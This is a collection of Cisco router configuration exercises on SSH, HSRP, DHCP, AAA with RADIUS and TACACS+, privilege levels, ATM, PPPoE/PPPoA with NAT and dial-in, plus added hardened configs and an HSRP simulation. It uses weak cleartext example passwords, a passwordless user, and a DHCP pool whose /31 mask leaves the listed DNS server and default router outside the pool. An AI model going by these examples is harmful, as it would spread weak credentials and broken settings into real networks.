305C300D 06092A86 4886F70D 01010105 00034B00 30480241 00DDD8C6 4B744520
F1499B01 49C485A2 20C9FB37 8CD11053 039D344B 3C5BD55E E84E17C8 FD62DA08
32020F80 910AFBCC 6D402F90 96E8A59B 40467A3E 8FEED18B B1020301 0001
% Key pair was generated at: 00:42:21 UTC Mar 1 2002
Key name: ap.test.com.server
Usage: Encryption Key
Key is not exportable.
Key Data:
307C300D 06092A86 4886F70D 01010105 00036B00 30680261 00B435A4 C007251B
312319CA 0E919F76 72D2D5A9 36B4710C CC4DE0C4 080D2B47 55970CA5 39F21170
D07C0000 832F6A1C 81411423 BE52CBF4 ECBE417E 1C3C09D1 2BBC90DF 8DA398DB
AE8EFA46 282AEC54 F0909F82 466A19DD EBEFAEDE 7B4B992F 5F020301 0001

An SSH client such as PuTTY can then be used to connect to the access point:
... graphic missed out on this version, see help file.
after which the client shows the message:
... graphic missed out on this version, see help file.
and the SSH connection is made, such as:
... graphic missed out on this version, see help file.
To get rid of the keys:

ap(config)# crypto key zeroize rsa

and to set the timeout and authentication retries:

ap(config)# ip ssh time-out 60
ap(config)# ip ssh authentication-retries 2

which sets the timeout to 60 seconds, and a maximum of two retries. Finally, to prevent
Telnet sessions:
ap(config)# line vty 0 4
ap(config-line)# transport input ssh

Router Challenge 127: HSRP


Outline: This challenge involves an analysis of HSRP.
Objectives: The objectives of this challenge are to explain HSRP.
Explanation
Cisco's Hot Standby Router Protocol (HSRP) allows a router to provide a backup for
another. In HSRP, the backup router only monitors the other router. If it determines that the
active (monitored) router is not responding, it will take over.
ap# config t
ap (config)# int e0
ap (config-if)# ip address 10.0.0.1 255.0.0.0
ap (config-if)# standby ?
<0-255>         group number
authentication  Authentication
delay           HSRP initialisation delay
ip              Enable HSRP and set the virtual IP address
mac-address     Virtual MAC address
name            Redundancy name string
preempt         Overthrow lower priority Active routers
priority        Priority level
redirect        Configure sending of ICMP Redirect messages with an HSRP virtual IP address as the gateway IP address
timers          Hello and hold timers
track           Priority tracking
use-bia         HSRP uses interface's burned in address
version         HSRP version
ap (config-if)# standby 1 ip 10.0.0.2
ap (config-if)# standby 1 preempt
ap (config-if)# standby 1 priority 100
ap (config-if)# standby 1 authentication edinburgh
ap (config-if)# standby 1 timers 5 15
ap (config-if)# st 1 ?
authentication  Authentication
ip              Enable HSRP and set the virtual IP address
mac-address     Virtual MAC address
name            Redundancy name string
preempt         Overthrow lower priority Active routers
priority        Priority level
timers          Hello and hold timers
track           Priority tracking
ap (config-if)# st 1 au ?
WORD  Plain text authentication string
md5   Use MD5 authentication
text  Plain text authentication
ap (config-if)# st 1 i ?
A.B.C.D  Virtual IP address
<cr>
ap (config-if)# st 1 m ?
H.H.H  MAC address
ap (config-if)# st 1 n ?
WORD  name string
ap (config-if)# st 1 pre ?
delay  Wait before preempting
<cr>
ap (config-if)# st 1 pri ?
<0-255>  Priority value
ap (config-if)# st 1 ti ?
<1-254>  Hello interval in seconds
msec     Specify hello interval in milliseconds
ap (config-if)# st 1 ti 1 ?
<2-255>  Hold time in seconds
ap (config-if)# st 1 tr ?
<1-500>            Tracked object number
Async              Async interface
BVI                Bridge-Group Virtual Interface
CDMA-Ix            CDMA Ix interface
CTunnel            CTunnel interface
Dialer             Dialer interface
FastEthernet       FastEthernet IEEE 802.3
Lex                Lex interface
Loopback           Loopback interface
MFR                Multilink Frame Relay bundle interface
Multilink          Multilink-group interface
Port-channel       Ethernet Channel of interfaces
Tunnel             Tunnel interface
Vif                PGM Multicast Host interface
Virtual-PPP        Virtual PPP interface
Virtual-TokenRing  Virtual TokenRing

HSRP uses a priority scheme to determine the default active router: the router intended to
be active is assigned a higher priority than all the other HSRP-configured routers (the default
priority is 100). The routers exchange multicast hello messages that advertise their priority.
Thus, if the active router fails to send these messages within a certain time (the hold time,
defined in the timers option), the standby router with the highest priority takes over.
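The priority and preempt election just described, as an added Python simulation (not the page's code and not Cisco's implementation): two routers in group 1 exchange hellos every 5 s with a 15 s hold time, as in the `standby 1 timers 5 15` line above; the active router's hellos stop, the standby takes over once the hold time has passed, and whether the original router takes the role back when it returns depends on `preempt`. Router names, addresses, the virtual IP and the failure times are constructed.

```python
from dataclasses import dataclass


@dataclass
class HsrpRouter:
    name: str
    ip: str
    priority: int = 100        # IOS default priority, as the text states
    preempt: bool = False      # 'standby <group> preempt'
    alive: bool = True         # False once the router stops sending hellos
    last_hello: float = float("-inf")


class HsrpGroup:
    """Election for one HSRP group: highest priority wins, ties go to the higher IP."""

    def __init__(self, group, virtual_ip, routers, hello=3, hold=10):
        self.group, self.virtual_ip, self.routers = group, virtual_ip, routers
        self.hello, self.hold = hello, hold        # 'standby <group> timers <hello> <hold>'
        self.active = None
        self.standby = None
        self.log = []                              # (time, name of the new active router)

    @staticmethod
    def _rank(r):
        return (r.priority, tuple(int(o) for o in r.ip.split(".")))

    def tick(self, now):
        """Advance the clock: send due hellos, time out silent peers, re-run the election."""
        for r in self.routers:
            if r.alive and now - r.last_hello >= self.hello:
                r.last_hello = now
        heard = [r for r in self.routers if now - r.last_hello <= self.hold]
        current = next((r for r in self.routers if r.name == self.active), None)
        if current is None or current not in heard:
            # no hello from the active router within the hold time: the best peer takes over
            new = max(heard, key=self._rank, default=None)
        else:
            new = current
            best = max(heard, key=self._rank)
            # a better router only displaces a working active router if it has preempt set
            if best is not current and best.preempt and self._rank(best) > self._rank(current):
                new = best
        if new is not None and new.name != self.active:
            self.active = new.name
            self.log.append((now, new.name))
        others = [r for r in heard if r is not new]
        self.standby = max(others, key=self._rank).name if others else None
        return self.active, self.standby


def run_scenario(preempt):
    """Constructed scenario: R1 (priority 100) stops sending hellos at t=25 and returns at t=60."""
    r1 = HsrpRouter("R1", "10.0.0.1", priority=100, preempt=preempt)
    r2 = HsrpRouter("R2", "10.0.0.2", priority=90)
    group = HsrpGroup(1, "10.0.0.254", [r1, r2], hello=5, hold=15)
    for t in range(0, 100, 5):
        if t == 25:
            r1.alive = False
        if t == 60:
            r1.alive = True
        group.tick(t)
    return group


if __name__ == "__main__":
    for p in (True, False):
        g = run_scenario(p)
        print("preempt=%s changes=%s final active=%s standby=%s" % (p, g.log, g.active, g.standby))
```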


Cisco Router Challenge 22


Outline
This challenge involves the configuration of a DHCP server on the router.
Objectives
The objectives of this challenge are to:

Setup a DHCP server.
Setup a DHCP Pool.
Define DHCP networks and subnets.
Define DHCP parameters, such as DNS, NetBIOS, Timeout and domain.

Example
> en
# config t
(config)# ip dhcp pool wyoming
(config-dhcp)# network 249.189.108.0 255.255.255.254
(config-dhcp)# dns-server 249.189.108.58
(config-dhcp)# netbios-name-server 249.189.108.61
(config-dhcp)# lease 3
(config-dhcp)# default-router 249.189.108.87
(config-dhcp)# exit
(config)# ip dhcp ?
conflict                   DHCP address conflict parameters
database                   Configure DHCP database agents
excluded-address           Prevent DHCP from assigning certain addresses
limited-broadcast-address  Use all 1's broadcast address
ping                       Specify ping parameters used by DHCP
pool                       Configure DHCP address pools
relay                      DHCP relay agent parameters
smart-relay                Enable Smart Relay feature
(config)# ip dhcp excluded-address 249.189.108.26
(config)# ip dhcp ping ?
packets  Specify number of ping packets
timeout  Specify ping timeout
(config)# ip dhcp ping timeout 350

Cisco Router Challenge 108


Outline
This challenge involves the configuration of a local server for AAA.
Objectives
The objectives of this challenge are to:

Define AAA.
Define the local server.

Example
> enable
# config t
(config)# aaa new-model
(config)# aaa authentication login default local
(config)# username fred password bert
(config)# username fred1 password bert2

Cisco Router Challenge 109


Outline
This challenge involves the configuration of a RADIUS server for AAA.
Objectives
The objectives of this challenge are to:

Define AAA.
Define the radius server.

Example
> enable
# config t
(config)# aaa new-model
(config)# radius-server ?
  attribute           Customize selected radius attributes
  authorization       Authorization processing information
  challenge-noecho    Data echoing to screen is disabled during Access-Challenge
  configure-nas       Attempt to upload static routes and IP pools at startup
  deadtime            Time to stop using a server that doesn't respond
  directed-request    Allow user to specify radius server to use with `@server'
  domain-stripping    Strip the domain from the username
  host                Specify a RADIUS server
  key                 encryption key shared with the radius servers
  local               Configure local RADIUS server
  optional-passwords  The first RADIUS request can be made without requesting a password
  retransmit          Specify the number of retries to active server
  timeout             Time to wait for a RADIUS server to reply
  unique-ident        Higher order bits of Acct-Session-Id
  vsa                 Vendor specific attribute configuration
(config)# radius-server host 39.100.234.1
(config)# radius-server key ?
LINE Text of shared key
(config)# radius-server key krinkle
(config)# aaa ?
  accounting      Accounting configurations parameters.
  authentication  Authentication configurations parameters.
  authorization   Authorization configurations parameters.
  configuration   Authorization configuration parameters.
  nas             NAS specific configuration
  new-model       Enable NEW access control commands and functions.(Disables OLD commands.)
  processes       Configure AAA background processes
(config)# aaa authentication ?
  arap             Set authentication lists for arap.
  banner           Message to use when starting login/authentication.
  enable           Set authentication list for enable.
  fail-message     Message to use for failed login/authentication.
  login            Set authentication lists for logins.
  nasi             Set authentication lists for NASI.
  password-prompt  Text to use when prompting for a password
  ppp              Set authentication lists for ppp.
  username-prompt  Text to use when prompting for a username
(config)# aaa authentication login ?
  WORD     Named authentication list.
  default  The default authentication list.
(config)# aaa authentication login default ?
  enable      Use enable password for authentication.
  group       Use Server-group
  line        Use line password for authentication.
  local       Use local username authentication.
  local-case  Use case-sensitive local username authentication.
  none        NO authentication.
(config)# aaa authentication login default group radius
(config)# aaa authentication ppp ?
  WORD     Named authentication list.
  default  The default authentication list.
(config)# aaa authentication ppp default group radius
(config)# aaa authorization ?
  commands         For exec (shell) commands.
  config-commands  For configuration mode commands.
  exec             For starting an exec (shell).
  network          For network services. (PPP, SLIP, ARAP)
  reverse-access   For reverse access connections


(config)# aaa authorization network ?
  WORD     Named authorization list.
  default  The default authorization list.
(config)# aaa authorization network default ?
  group             Use server-group.
  if-authenticated  Succeed if user has authenticated.
  local             Use local database.
  none              No authorization (always succeeds).
(config)# aaa authorization network default group radius
(config)# aaa authorization exec default group radius

Cisco Router Challenge 110


Outline
This challenge involves the configuration of a Tacacs+ server for AAA.
Objectives
The objectives of this challenge are to:

Define AAA.
Define the Tacacs+ server.

Example
> enable
# config t
(config)# aaa new-model
(config)# tacacs-server host 39.100.234.1
(config)# tacacs-server key krinkle
(config)# aaa authentication login default group tacacs+
(config)# aaa authentication ppp default group tacacs+
(config)# aaa authorization network default group tacacs+
(config)# aaa authorization exec default group tacacs+
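Both this challenge and the RADIUS one before it point every method list at a single external server with no second method. If that server is unreachable, nobody can log in. The configuration below is an added example, not from the original page: it takes the page's server 39.100.234.1 and key krinkle and adds a named server group, a second server, a timeout and a local fallback. The second server 39.100.234.2, the group name MGMT-TACACS, the timers and the rescue account are assumptions. The RADIUS version (Challenge 109) has the same shape with radius-server host ... key ... and aaa group server radius; the one thing RADIUS cannot do on IOS is per-command authorization, which is why the next challenge uses TACACS+.

```cisco
! Added example, not from the original page. Server 39.100.234.1 and key
! krinkle are the page's values; everything else is an assumption.
aaa new-model
!
tacacs-server host 39.100.234.1 key krinkle
tacacs-server host 39.100.234.2 key krinkle
tacacs-server timeout 5
aaa group server tacacs+ MGMT-TACACS
 server 39.100.234.1
 server 39.100.234.2
!
! Fallback account. A method list moves to the next method only when a
! server does not answer; a server that answers "reject" is final, so the
! rescue user works only during an outage, not as a back door past policy.
username rescue privilege 15 secret <rescue-secret>
enable secret <enable-secret>
!
aaa authentication login default group MGMT-TACACS local
aaa authentication enable default group MGMT-TACACS enable
aaa authorization exec default group MGMT-TACACS local
aaa authentication ppp default group MGMT-TACACS
aaa authorization network default group MGMT-TACACS
!
! Prove key and reachability before logging out of the console:
!   test aaa group MGMT-TACACS fred bert legacy   -> "User successfully authenticated"
!                                                     (or a reject from the server)
!   show tacacs                                   -> per-server request/reply counters move
!   debug aaa authentication                      -> shows which method answered
```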

Cisco Router Challenge 111


Outline
This challenge involves the configuration of a Tacacs+ server for privileges.
Objectives
The objectives of this challenge are to:

Define AAA.


Define privileges.
Define command authorization for a Tacacs+ server.

Example
> enable
# config t
(config)# aaa new-model
(config)# privilege configure level 7 snmp-server host
(config)# privilege configure level 7 snmp-server enable
(config)# privilege configure level 7 snmp-server
(config)# privilege exec level 7 ping
(config)# privilege exec level 7 configure terminal
(config)# privilege exec level 7 configure
(config)# tacacs-server host 39.100.234.1
(config)# tacacs-server key krinkle
(config)# aaa authorization commands 0 default group tacacs+
(config)# aaa authorization commands 15 default group tacacs+
(config)# aaa authorization commands 7 default group tacacs+

Explanation
The privilege levels go from level 0 to level 15, such as:

Level 0. This only includes five commands: disable, enable, exit, help and logout.
Level 1. This is the non-privileged (user EXEC) mode with a prompt of router>.
Level 15. This is the highest level of privilege (privileged EXEC), and has a prompt of router#.

Typical level 1 commands are:

  access-enable    Create a temporary Access-List entry
  clear            Reset functions
  connect          Open a terminal connection
  disable          Turn off privileged commands
  disconnect       Disconnect an existing network connection
  enable           Turn on privileged commands
  exit             Exit from the EXEC
  help             Description of the interactive help system
  lock             Lock the terminal
  login            Log in as a particular user
  logout           Exit from the EXEC
  name-connection  Name an existing network connection
  ping             Send echo messages
  rcommand         Run command on remote switch
  resume           Resume an active network connection
  show             Show running system information
  systat           Display information about terminal lines
  telnet           Open a telnet connection
  terminal         Set terminal line parameters
  traceroute       Trace route to destination
  tunnel           Open a tunnel connection
  where            List active connections

Thus:
(config)# privilege configure level 7 snmp-server host
(config)# privilege configure level 7 snmp-server enable
(config)# privilege configure level 7 snmp-server
(config)# privilege exec level 7 ping
(config)# privilege exec level 7 configure terminal
(config)# privilege exec level 7 configure

moves these commands to Level 7. ping is a Level 1 command and is now a Level 7 command, while the rest have moved from Level 15 to Level 7. Two points to check before relying on this: a command moved to Level 7 becomes available to every user at Level 7 and above, so privilege levels only narrow what the lower levels can do; and the three aaa authorization commands lists above name the TACACS+ server group as their only method, so if no server answers, every command at Levels 0, 7 and 15 is refused with "Command authorization failed" rather than allowed.

Cisco Router Challenge 112


Outline
This challenge involves the configuration of per-user security on a router.
Objectives
The objectives of this challenge are to:

Define usernames and passwords.


Define privilege levels.
Restrict access of users to a single host.

Example
> enable
# config t
(config)# username fred password bert
(config)# username test nopassword
(config)# username fred privilege 15
(config)# username test privilege 1
(config)# username test user-maxlinks 2
(config)# access-list 9 permit host 192.168.0.1
(config)# username fred access-class 9

Explanation
The privilege levels go from level 0 to level 15, such as:

Level 0. This only includes five commands: disable, enable, exit, help and logout.
Level 1. This is the non-privileged (user EXEC) mode with a prompt of router>.
Level 15. This is the highest level of privilege (privileged EXEC), and has a prompt of router#.



Thus:
(config)# username fred privilege 15
(config)# username test privilege 1

sets the maximum privilege level for fred at 15, while test will only be able to enter the non-privileged mode. Also:
(config)# access-list 9 permit host 192.168.0.1
(config)# username fred access-class 9

applies access list 9 as an outgoing access class for the duration of fred's session: once logged in, fred can open connections (telnet and the like) from the router only to the single host 192.168.0.1. It does not control where fred logs in from; to restrict the source of logins, apply access-class 9 in under the vty lines instead. The following:
(config)# username test user-maxlinks 2

restricts the number of simultaneous connections for test to two. Two cautions: username test nopassword lets test log in with no password at all, and the per-user attributes access-class and user-maxlinks are enforced through AAA authorization, so they only take effect once aaa new-model is enabled and authorization is performed against the local database.

Cisco Router Challenge 113


Outline
This challenge involves the configuration of Tacacs+ for accounting.


Objectives
The objectives of this challenge are to:

Define Tacacs+.
Define accounting for start and stop events.

Example
> enable
# config t
(config)# aaa new-model
(config)# aaa accounting network default start-stop group tacacs+
(config)# aaa accounting reverse-access default start-stop group tacacs+
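Challenge 111 moved commands between privilege levels and sent every command to TACACS+ for authorization; this challenge adds accounting. The configuration below is an added example, not from the original page, that puts the two together in the form a practitioner would deploy: per-level command authorization that does not refuse every command when the server is down, and accounting for sessions and commands. Server 39.100.234.1, key krinkle and level 7 are the page's values; the group name MGMT-TACACS and the operator account noc are assumptions.

```cisco
! Added example, not from the original page (Challenges 111 and 113 combined).
aaa new-model
tacacs-server host 39.100.234.1 key krinkle
aaa group server tacacs+ MGMT-TACACS
 server 39.100.234.1
!
! A level-7 operator may ping, enter configuration mode and manage only the
! snmp-server host / snmp-server enable commands. A command is reachable at
! a level only if every parent keyword is at that level or lower, which is
! why "configure" and "snmp-server" are moved alongside the full commands.
privilege exec level 7 ping
privilege exec level 7 configure terminal
privilege exec level 7 configure
privilege configure level 7 snmp-server host
privilege configure level 7 snmp-server enable
privilege configure level 7 snmp-server
username noc privilege 7 secret <noc-secret>
!
! Command authorization is per level: a level with no list is never checked.
! "if-authenticated" as the last method means that when no server answers,
! an authenticated user keeps what the privilege level already allows
! instead of having every command refused.
aaa authorization exec default group MGMT-TACACS local
aaa authorization commands 0 default group MGMT-TACACS if-authenticated
aaa authorization commands 7 default group MGMT-TACACS if-authenticated
aaa authorization commands 15 default group MGMT-TACACS if-authenticated
aaa authorization config-commands
!
! Accounting (Challenge 113): session start/stop, and every command run at
! levels 7 and 15, so the TACACS+ log shows who did what and when.
aaa accounting exec default start-stop group MGMT-TACACS
aaa accounting commands 7 default stop-only group MGMT-TACACS
aaa accounting commands 15 default stop-only group MGMT-TACACS
aaa accounting network default start-stop group MGMT-TACACS
!
! Checks, logged in as noc:
!   show privilege                          -> "Current privilege level is 7"
!   configure terminal / snmp-server enable traps
!       -> accepted, or "Command authorization failed" if the server's policy denies it
!   configure terminal / ip route 0.0.0.0 0.0.0.0 Null0
!       -> "% Invalid input": the command is not at level 7, so the parser
!          rejects it before the TACACS+ server is even consulted
```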

Cisco Router Challenge 114


Outline
This challenge involves the configuration of ATM.
Objectives
The objectives of this challenge are to:

Define E0.
Define ATM.
Define bridge protocol.

Example
> enable
# config t
(config)# int e0
(config-if)# ip address 192.168.1.1 255.255.255.0
(config-if)# no shut
(config-if)# bridge-group 1
(config-if)# exit
(config)# int atm0
(config-if)# ?
Interface configuration commands:
  access-expression       Build a bridge boolean access expression
  apollo                  Apollo interface subcommands
  appletalk               Appletalk interface subcommands
  arp                     Set arp type (arpa, probe, snap) or timeout
  atm                     Modify ATM parameters
  backup                  Modify backup parameters
  bandwidth               Set bandwidth informational parameter
  bridge-group            Transparent bridging interface parameters
  carrier-delay           Specify delay for interface transitions
  cdp                     CDP interface subcommands
  class-int               Configure default vc-class name
  clns                    CLNS interface subcommands
  crypto                  Encryption/Decryption commands
  custom-queue-list       Assign a custom queue list to an interface
  decnet                  Interface DECnet config commands
  default                 Set a command to its defaults
  delay                   Specify interface throughput delay
  description             Interface specific description
  dspu                    Down Stream PU
  exit                    Exit from interface configuration mode
  fair-queue              Enable Fair Queuing on an Interface
  fras                    DLC Switch Interface Command
  help                    Description of the interactive help system
  hold-queue              Set hold queue depth
  ip                      Interface Internet Protocol config commands
  ipv6                    IPv6 interface subcommands
  ipx                     Novell/IPX interface subcommands
  isis                    IS-IS commands
  iso-igrp                ISO-IGRP interface subcommands
  lan-name                LAN Name command
  lane                    Modify LANE parameters
  lat                     LAT commands
  llc2                    LLC2 Interface Subcommands
  load-interval           Specify interval for load calculation for an interface
  locaddr-priority        Assign a priority group
  logging                 Configure logging for interface
  loopback                Configure internal loopback on an interface
  mac-address             Manually set interface MAC address
  map-group               Configure static map group
  max-reserved-bandwidth  Maximum Reservable Bandwidth on an Interface
  mls                     mls sub/interface commands
  mpls                    Configure MPLS interface parameters
  mpoa                    MPOA interface configuration commands
  mtu                     Set the interface Maximum Transmission Unit (MTU)
  multilink-group         Put interface in a multilink bundle
  multiring               Enable RIF usage for a routable protocol
  netbios                 Use a defined NETBIOS access list or enable name-caching
  no                      Negate a command or set its defaults
  ntp                     Configure NTP
  priority-group          Assign a priority group to an interface
  pvc                     Configure ATM PVC parameters
  random-detect           Enable Weighted Random Early Detection (WRED) on an Interface
  rate-limit              Rate Limit
  sap-priority            Assign a priority group
  service-policy          Configure QoS Service Policy
  shutdown                Shutdown the selected interface
  smrp                    Simple Multicast Routing Protocol interface subcommands
  sna                     SNA pu configuration
  snapshot                Configure snapshot support on the interface
  snmp                    Modify SNMP interface parameters
  source-bridge           Configure interface for source-route bridging
  squelch                 10BaseT 100 meter limit enforcement
  sscop                   SSCOP Interface Subcommands
  standby                 Interface HSRP configuration commands
  svc                     Configure ATM SVC parameters
  tag-switching           Tag Switching interface configuration commands
  tarp                    TARP interface subcommands
  timeout                 Define timeout values for this interface
  traffic-shape           Enable Traffic Shaping on an Interface or Sub-Interface
  transmit-interface      Assign a transmit interface to a receive-only interface
  vines                   VINES interface subcommands
  xns                     XNS interface subcommands
(config-if)# mac-address 1111.2222.3333
(config-if)# dsl operating-mode auto
(config-if)# bridge-group 1
(config-if)# pvc ?
  <0-7>     Enter VPI/VCI value(slash required)
  <1-1023>  Enter VCI value
  WORD      Optional handle to refer to this connection
(config-if)# pvc 8/35
(config-if-atm-vc)# ?
ATM virtual circuit configuration commands:
  atm            atm pvc commands
  broadcast      Pseudo-broadcast
  class-vc       Configure default vc-class name
  default        Set a command to its defaults
  dialer         set dialer pool this pvc belongs to
  encapsulation  Select ATM Encapsulation for VC
  exit-vc        Exit from ATM VC configuration mode
  ilmi           Configure ILMI management
  inarp          Change the inverse arp timer on the PVC
  no             Negate a command or set its defaults
  oam            Configure oam parameters
  oam-pvc        Send oam cells on this pvc
  pppoe-client   pppoe client
  protocol       Map an upper layer protocol to this connection.
  ubr            Enter Unspecified Peak Cell Rate (pcr) in Kbps.
  ubr+           Enter Peak Cell Rate(pcr)Minimum Cell Rate(mcr) in Kbps.
  vbr-nrt        Enter Variable Bit Rate (pcr)(scr)(bcs)
  vcci           VCC Identifier
(config-if-atm-vc)# encapsulation ?
  aal5ciscoppp  Cisco PPP over AAL5 Encapsulation
  aal5mux       AAL5+MUX Encapsulation
  aal5nlpid     AAL5+NLPID Encapsulation
  aal5snap      AAL5+LLC/SNAP Encapsulation
(config-if-atm-vc)# encapsulation aal5snap
(config-if-atm-vc)# exit
(config-if)# exit
(config)# bridge 1 protocol ieee

Explanation
In this case a transparent bridge is created between the E0 and the ATM0 port, so the Ethernet segment and the far end of the PVC form one Layer 2 domain, with IEEE spanning tree (bridge 1 protocol ieee) preventing loops. The encapsulation is aal5snap (AAL5 with LLC/SNAP, Logical Link Control/Subnetwork Access Protocol), which supports multiple protocols over the same PVC by tagging each frame with its protocol type. Because bridging extends the LAN's broadcast domain to the provider side of the circuit, every host on E0 is reachable at Layer 2 from the far end unless a bridge-group access list is applied.

Cisco Router Challenge 115


Outline


This challenge involves the configuration of ATM with a dialer interface and to encapsulate
PPP within an Ethernet environment.
Objectives
The objectives of this challenge are to:

Define a dialer
Define ATM.

Example
> enable
# config t
(config)# int atm0
(config-if)# dsl operating-mode auto
(config-if)# pvc 8/35
(config-if-atm-vc)# pppoe-client dial-pool-number 1
(config-if-atm-vc)# exit
(config-if)# exit
(config)# int dialer0
(config-if)# ip address negotiated
(config-if)# encapsulation ppp
(config-if)# dialer pool 1
(config-if)# ip mtu 1492
(config-if)# ppp chap hostname newyork
(config-if)# ppp chap password default1

Explanation
PPPoE encapsulates PPP within an Ethernet frame, which is here carried over the ATM PVC; the pppoe-client dial-pool-number command ties the PVC to dialer pool 1, and the dialer interface carries the PPP session itself. The ip mtu 1492 is needed because the 8-byte PPPoE and PPP headers sit inside a 1500-byte Ethernet payload; without it, full-size packets are fragmented or silently dropped. The CHAP password (default1) is stored in clear text in the configuration unless service password-encryption is enabled.


Cisco Router Challenge 116


Outline
This challenge involves the configuration of PPPoA with NAT.
Objectives
The objectives of this challenge are to:

Define a dialer.
Define ATM.

Example
> enable
# config t
(config)# int e0
(config-if)# ip address 192.168.1.1 255.255.255.0
(config-if)# ip nat inside
(config-if)# no shut
(config-if)# exit
(config)# int atm0
(config-if)# dsl operating-mode auto
(config-if)# pvc 8/35
(config-if-atm-vc)# encapsulation aal5mux ppp dialer
(config-if-atm-vc)# dialer pool-member 1
(config-if-atm-vc)# exit
(config-if)# exit
(config)# int dialer0


(config-if)# ip address negotiated
(config-if)# ip nat outside
(config-if)# encapsulation ppp
(config-if)# dialer pool 1
(config-if)# ppp chap hostname newyork
(config-if)# ppp chap password default1
(config-if)# exit
(config)# access-list 10 permit 192.168.1.0 0.0.0.255
(config)# ip nat inside source list 10 interface dialer0 overload
(config)# ip route 0.0.0.0 0.0.0.0 dialer0

Explanation
PPPoA encapsulates PPP directly within ATM cells (AAL5 MUX encapsulation); there is no Ethernet or PPPoE header, so no ip mtu 1492 is needed. For the NAT overload (PAT) to work, three things must be in place that are easy to miss: the LAN interface must be marked ip nat inside, the dialer interface must be marked ip nat outside, and access list 10 must match the inside network actually in use (192.168.1.0/24 on E0). If any of them is missing, show ip nat translations stays empty and hosts behind the router have no connectivity.
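The following is an added example, not from the original page: the same PPPoA and NAT configuration written out as a complete running configuration, with the inside/outside markings, a NAT access list that matches the real LAN, and, because the dialer now carries a public address, inbound traffic on the DSL side filtered. 192.168.1.0/24, PVC 8/35, dialer pool 1 and the CHAP credentials are the page's values; the inspection rule FW and access list 110 are an assumed policy.

```cisco
! Added example, not from the original page. The inspection rule "FW" and
! access list 110 are assumptions; addresses and credentials are the page's.
interface Ethernet0
 description LAN
 ip address 192.168.1.1 255.255.255.0
 ip nat inside
 no shutdown
!
interface ATM0
 no ip address
 dsl operating-mode auto
 pvc 8/35
  encapsulation aal5mux ppp dialer
  dialer pool-member 1
!
interface Dialer0
 description PPPoA uplink, public address learned by IPCP
 ip address negotiated
 ip nat outside
 ip access-group 110 in
 ip inspect FW out
 encapsulation ppp
 dialer pool 1
 ppp chap hostname newyork
 ppp chap password default1
!
! NAT: the list must match the inside network. 10.0.0.0/24 would match nothing here.
access-list 10 permit 192.168.1.0 0.0.0.255
ip nat inside source list 10 interface Dialer0 overload
ip route 0.0.0.0 0.0.0.0 Dialer0
!
! Stateful inspection (CBAC) of sessions leaving on Dialer0 opens the matching
! return traffic through access list 110; everything unsolicited from the
! Internet is dropped and logged. packet-too-big is allowed so path-MTU
! discovery keeps working.
ip inspect name FW tcp
ip inspect name FW udp
ip inspect name FW icmp
access-list 110 permit icmp any any packet-too-big
access-list 110 deny ip any any log
!
! Checks:
!   show ip nat statistics     -> Inside interfaces: Ethernet0 / Outside interfaces: Dialer0
!   show ip nat translations   -> entries appear once a LAN host opens a session
!   show ip inspect sessions   -> the same sessions tracked by CBAC
```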

Cisco Router Challenge 117


Outline
This challenge involves the configuration of ATM for VPDN.
Objectives
The objectives of this challenge are to:

Define a dialer
Define ATM.

Example
> enable
# config t
(config)# vpdn enable
(config)# vpdn-group ?
  WORD  VPDN Group name
(config)# vpdn-group test
(config-vpdn)# ?
VPDN group configuration commands:
  accept-dialin    VPDN accept-dialin group configuration
  accept-dialout   VPDN accept-dialout group configuration
  default          Set a command to its defaults
  description      Description for this VPDN group
  exit             Exit from VPDN group configuration mode
  ip               IP settings for tunnel
  no               Negate a command or set its defaults
  redirect         Call redirection options
  request-dialin   VPDN request-dialin group configuration
  request-dialout  VPDN request-dialout group configuration
  source           Configuration source for this vpdn-group
  source-ip        Set source IP address for this vpdn-group
  vpn              VPN ID/VRF name


(config-vpdn)# request-dialin ?
  <cr>
(config-vpdn)# request-dialin
(config-vpdn-req-in)# ?
VPDN group request-dialin configuration commands:
  default   Set a command to its defaults
  dnis      Initiate a tunnel based on DNIS
  domain    Initiate a tunnel based on domain name
  exit      Exit from VPDN group request dialin sub-configuration mode
  multihop  Initiate a multihop tunnel based on peer hostname or tunnel ID
  no        Negate a command or set its defaults
  protocol  Tunneling protocol to be used
(config-vpdn-req-in)# protocol ?
  l2f    Use L2F
  l2tp   Use L2TP
  pptp   Use PPTP
  pppoe  Use PPPoE
(config-vpdn-req-in)# protocol pppoe
(config-vpdn-req-in)# exit
(config-vpdn)# exit
(config)# int e0
(config-if)# ip address 192.168.1.1 255.255.255.0
(config-if)# no shut
(config-if)# exit
(config)# int atm0
(config-if)# dsl operating-mode auto
(config-if)# pvc 8/35
(config-if-atm-vc)# pppoe-client dial-pool-number 1
(config-if-atm-vc)# exit
(config-if)# exit
(config)# int dialer0
(config-if)# ip address negotiated
(config-if)# encapsulation ppp
(config-if)# dialer pool 1
(config-if)# ip mtu 1492
(config-if)# ppp chap hostname newyork
(config-if)# ppp chap password default1

Cisco Router Challenge 118


Outline
This challenge involves the configuration of interactive PPP sessions.
Objectives
The objectives of this challenge are to:

Define async parameters.
Define line parameters.

Example
> enable
# config t
(config)# int async 6
(config-if)# encapsulation ppp
(config-if)# async ?
  default  Specify default parameters
  dynamic  Specify parameters which user may change
  mode     Specify line mode (interactive or dedicated interface use)
(config-if)# async mode ?
  dedicated    Line is dedicated as an async interface
  interactive  Line may be switched between interactive use and async interface
(config-if)# async mode interactive
(config-if)# exit
(config)# line 1
(config-line)# autoselect ?
  arap          Set line to allow ARAP autoselection
  during-login  Do autoselect at the Username/Password prompt
  ppp           Set line to allow PPP autoselection
  slip          Set line to allow SLIP autoselection
  timeout       Set wait timeout for initial autoselect byte
  <cr>
(config-line)# autoselect ppp
(config-line)# autoselect during-login

Cisco Router Challenge 119


Outline
This challenge involves the configuration of the interface addressing method for dial-in devices: the async interface is left unnumbered and borrows its IP address from a loopback interface.
Objectives
The objectives of this challenge are to:

Define async parameters.
Define loopback parameters.

Example
> enable
# config t
(config)# int loopback1
(config-if)# ip address 192.168.1.1 255.255.255.0
(config-if)# exit
(config)# int async 6
(config-if)# ip unnumbered loopback1

Cisco Router Challenge 120


Outline


This challenge involves the configuration of a specific address for the dial-in host.
Objectives
The objectives of this challenge are to:

Define async parameters.
Define the peer address.

Example
> enable
# config t
(config)# int async 6
(config-if)# peer default ip address 192.168.1.1

Explanation
In this example the access server uses the Async 6 port for an asynchronous connection. Once the call is up, it assigns the connected host the IP address 192.168.1.1 (Figure 1).

Figure 1: Host assigned a fixed IP address. The access server's Async 6 port connects to the host over the PSTN; with the commands above (int async 6, peer default ip address 192.168.1.1) the host is assigned the address 192.168.1.1.

